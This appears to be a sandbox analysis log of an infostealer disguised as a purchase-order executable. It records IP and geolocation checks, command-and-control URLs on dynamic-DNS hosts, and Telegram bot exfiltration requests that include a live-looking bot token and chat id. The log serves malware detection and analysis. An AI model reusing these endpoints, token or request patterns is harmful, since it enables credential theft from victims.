Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:472847%0D%0ADate%20and%20Time:%2017/12/2024%20/%2015:46:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20472847%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd1f358331f29dHost: api.telegram.orgContent-Length: 581

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 16 Dec 2024 13:14:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177864706.00000000061AB000.00000004.00000020.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4167292063.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4166570008.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?2de8b59c7a8c8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7bc44137868e4
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?92b2c01ab67e9
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?b9539a5e31719
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4177387207.0000000006110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?e0919bc1731d3
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4167292063.0000000000BEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786459331.00000000054A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.comPXF
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1786588801.0000000006B42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002B40000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002971000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003C42000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BF4000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A50000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AC5000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A2B000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BCF000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003A56000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003BFA000.00000004.00000800.00020000.00000000.sdmp, PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4174136186.0000000003AA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 50136 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50134
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50136
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50089 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
